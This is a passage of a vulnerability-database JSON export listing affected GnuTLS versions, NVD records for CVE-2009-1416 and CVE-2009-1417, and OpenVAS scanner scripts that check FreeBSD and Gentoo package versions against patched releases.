"cpe:2.3:a:gnu:gnutls:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:13", "description": "lib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates RSA keys stored in DSA structures, instead of the intended DSA keys, which might allow remote attackers to spoof signatures on certificates or have unspecified other impact by leveraging an invalid DSA key.", "edition": 3, "cvss3": {}, "published": "2009-04-30T20:30:00", "title": "CVE-2009-1416", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1416"], "modified": "2009-06-10T05:29:00", "cpe": ["cpe:/a:gnu:gnutls:2.5.0", "cpe:/a:gnu:gnutls:2.6.1", "cpe:/a:gnu:gnutls:2.6.2", "cpe:/a:gnu:gnutls:2.6.4", "cpe:/a:gnu:gnutls:2.6.0", "cpe:/a:gnu:gnutls:2.6.3", "cpe:/a:gnu:gnutls:2.6.5"], "id": "CVE-2009-1416", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1416", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:gnutls:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:18", "description": "gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and expiration times of X.509 certificates, which allows remote attackers to successfully present a certificate that is (1) not yet valid or (2) no longer valid, related to lack of time checks in the _gnutls_x509_verify_certificate function in lib/x509/verify.c in libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup.", "edition": 5, "cvss3": {}, "published": "2009-04-30T20:30:00", "title": "CVE-2009-1417", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1417"], "modified": "2017-08-17T01:30:00", "cpe": ["cpe:/a:gnu:gnutls:1.2.11", "cpe:/a:gnu:gnutls:1.0.16", "cpe:/a:gnu:gnutls:2.1.3", "cpe:/a:gnu:gnutls:1.7.19", "cpe:/a:gnu:gnutls:1.5.5", "cpe:/a:gnu:gnutls:1.0.25", "cpe:/a:gnu:gnutls:1.2.4", "cpe:/a:gnu:gnutls:1.7.10", "cpe:/a:gnu:gnutls:1.6.3", "cpe:/a:gnu:gnutls:1.6.0", "cpe:/a:gnu:gnutls:2.2.0", "cpe:/a:gnu:gnutls:1.1.23", "cpe:/a:gnu:gnutls:1.7.6", "cpe:/a:gnu:gnutls:1.7.0", "cpe:/a:gnu:gnutls:2.1.7", "cpe:/a:gnu:gnutls:1.0.17", "cpe:/a:gnu:gnutls:2.4.0", "cpe:/a:gnu:gnutls:2.1.5", "cpe:/a:gnu:gnutls:2.1.2", "cpe:/a:gnu:gnutls:2.3.9", "cpe:/a:gnu:gnutls:2.4.1", "cpe:/a:gnu:gnutls:1.3.0", "cpe:/a:gnu:gnutls:1.0.24", "cpe:/a:gnu:gnutls:1.7.15", "cpe:/a:gnu:gnutls:1.1.15", "cpe:/a:gnu:gnutls:1.1.13", "cpe:/a:gnu:gnutls:1.6.2", "cpe:/a:gnu:gnutls:1.5.1", "cpe:/a:gnu:gnutls:1.0.20", "cpe:/a:gnu:gnutls:1.3.3", "cpe:/a:gnu:gnutls:1.7.13", "cpe:/a:gnu:gnutls:2.2.4", "cpe:/a:gnu:gnutls:1.7.7", "cpe:/a:gnu:gnutls:1.2.8.1a1", "cpe:/a:gnu:gnutls:1.4.2", "cpe:/a:gnu:gnutls:2.3.5", "cpe:/a:gnu:gnutls:2.1.4", "cpe:/a:gnu:gnutls:2.0.0", "cpe:/a:gnu:gnutls:2.3.7", "cpe:/a:gnu:gnutls:2.6.1", "cpe:/a:gnu:gnutls:2.0.3", "cpe:/a:gnu:gnutls:1.4.0", "cpe:/a:gnu:gnutls:1.4.3", "cpe:/a:gnu:gnutls:1.2.7", "cpe:/a:gnu:gnutls:1.1.20", "cpe:/a:gnu:gnutls:1.2.2", "cpe:/a:gnu:gnutls:1.3.5", "cpe:/a:gnu:gnutls:1.7.5", "cpe:/a:gnu:gnutls:2.2.3", "cpe:/a:gnu:gnutls:1.7.12", "cpe:/a:gnu:gnutls:1.0.23", "cpe:/a:gnu:gnutls:2.3.1", "cpe:/a:gnu:gnutls:1.7.18", "cpe:/a:gnu:gnutls:1.1.17", "cpe:/a:gnu:gnutls:1.7.2", "cpe:/a:gnu:gnutls:1.5.3", "cpe:/a:gnu:gnutls:1.4.4", "cpe:/a:gnu:gnutls:2.3.0", "cpe:/a:gnu:gnutls:1.2.0", "cpe:/a:gnu:gnutls:2.3.3", "cpe:/a:gnu:gnutls:2.4.2", "cpe:/a:gnu:gnutls:1.6.1", "cpe:/a:gnu:gnutls:1.7.17", "cpe:/a:gnu:gnutls:1.7.16", "cpe:/a:gnu:gnutls:1.1.22", "cpe:/a:gnu:gnutls:2.3.10", "cpe:/a:gnu:gnutls:1.7.8", "cpe:/a:gnu:gnutls:1.2.6", "cpe:/a:gnu:gnutls:1.1.19", "cpe:/a:gnu:gnutls:2.1.8", "cpe:/a:gnu:gnutls:1.7.14", "cpe:/a:gnu:gnutls:1.5.0", "cpe:/a:gnu:gnutls:1.5.4", "cpe:/a:gnu:gnutls:1.4.5", "cpe:/a:gnu:gnutls:2.6.2", "cpe:/a:gnu:gnutls:1.7.11", "cpe:/a:gnu:gnutls:2.0.1", "cpe:/a:gnu:gnutls:1.0.18", "cpe:/a:gnu:gnutls:2.6.4", "cpe:/a:gnu:gnutls:1.1.14", "cpe:/a:gnu:gnutls:2.3.6", "cpe:/a:gnu:gnutls:1.2.8", "cpe:/a:gnu:gnutls:1.1.18", "cpe:/a:gnu:gnutls:2.3.11", "cpe:/a:gnu:gnutls:1.2.10", "cpe:/a:gnu:gnutls:1.3.1", "cpe:/a:gnu:gnutls:2.2.5", "cpe:/a:gnu:gnutls:2.3.4", "cpe:/a:gnu:gnutls:1.4.1", "cpe:/a:gnu:gnutls:2.6.0", "cpe:/a:gnu:gnutls:1.3.2", "cpe:/a:gnu:gnutls:2.0.4", "cpe:/a:gnu:gnutls:2.1.6", "cpe:/a:gnu:gnutls:2.2.2", "cpe:/a:gnu:gnutls:1.5.2", "cpe:/a:gnu:gnutls:1.7.9", "cpe:/a:gnu:gnutls:2.6.3", "cpe:/a:gnu:gnutls:2.0.2", "cpe:/a:gnu:gnutls:1.2.1", "cpe:/a:gnu:gnutls:1.7.4", "cpe:/a:gnu:gnutls:2.6.5", "cpe:/a:gnu:gnutls:2.1.0", "cpe:/a:gnu:gnutls:1.0.22", "cpe:/a:gnu:gnutls:2.1.1", "cpe:/a:gnu:gnutls:2.3.8", "cpe:/a:gnu:gnutls:2.2.1", "cpe:/a:gnu:gnutls:1.1.21", "cpe:/a:gnu:gnutls:1.2.3", "cpe:/a:gnu:gnutls:1.1.16", "cpe:/a:gnu:gnutls:1.2.9", "cpe:/a:gnu:gnutls:1.0.19", "cpe:/a:gnu:gnutls:2.3.2", "cpe:/a:gnu:gnutls:1.7.1", "cpe:/a:gnu:gnutls:1.3.4", "cpe:/a:gnu:gnutls:1.0.21", "cpe:/a:gnu:gnutls:1.2.5", "cpe:/a:gnu:gnutls:1.7.3"], "id": "CVE-2009-1417", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1417", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:gnu:gnutls:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.8.1a1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:14:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64785", "href": "http://plugins.openvas.org/nasl.php?oid=64785", "type": "openvas", "title": "FreeBSD Ports: gnutls", "sourceData": "#\n#VID b31a1088-460f-11de-a11a-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID b31a1088-460f-11de-a11a-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n gnutls\n gnutls-devel\n\nCVE-2009-1415\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free.\n\nCVE-2009-1416\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key.\n\nCVE-2009-1417\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3515\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3516\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3517\nhttp://www.vuxml.org/freebsd/b31a1088-460f-11de-a11a-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64785);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_bugtraq_id(34783);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: gnutls\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gnutls\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package gnutls version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"gnutls-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.7.8\")<0) {\n txt += 'Package gnutls-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200905-04.", "modified": "2017-07-07T00:00:00", "published": "2009-05-25T00:00:00", "id": "OPENVAS:64043", "href": "http://plugins.openvas.org/nasl.php?oid=64043", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200905-04 (gnutls)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in GnuTLS might result in a Denial of Service,\n spoofing or the generation of invalid keys.\";\ntag_solution = \"All GnuTLS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/gnutls-2.6.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200905-04\nhttp://bugs.gentoo.org/show_bug.cgi?id=267774\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200905-04.\";\n\n \n \n\nif(description)\n{\n script_id(64043);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200905-04 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n 